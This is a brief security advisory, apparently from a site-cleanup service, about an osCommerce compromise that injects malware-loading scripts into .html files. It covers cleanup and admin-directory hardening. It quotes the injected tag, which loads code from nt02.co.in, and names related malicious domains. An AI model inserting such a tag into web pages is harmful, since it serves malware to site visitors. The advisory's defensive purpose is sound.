Updated: March 28, 2011

The nt02.co.in osCommerce malware hack utilizes a vulnerability in osCommerce to place code into website that causes them to distribute malware. A malware script is placed at the bottom of .html files on the website. Some of the domains the malware script has called a file from are nt02.co.in, nt04.in, nt06.in, and nt07.in.

To clean the website, the website needs to be reverted to a clean backup or the malware script needs to be removed from the files and any backdoor scripts added to the website need to be removed (our Basic Backdoor Script Finder will find some of the most popular backdoor scripts).

For osCommerce 2.2, the best way to prevent the vulnerabilities from being exploited is by renaming and password protecting the admin directory. osCommerce 2.3 does not contain the vulnerabilites, but it is still recommend to rename and password protect the admin directory.

Recent Script Format On Web Pages:

<script src="http://nt02.co.in/3"></script>

Related:

Service

• Hacked osCommerce Store Cleanup

Resources

• Request a Malware Review from Google
• Request a Malware Review from Yahoo
• Request a Malware Review from Bing
• Set Up a Google Malware Warning Email Alert
• Cross-Site Malware Warning
• Unobfuscate JavaScript Malware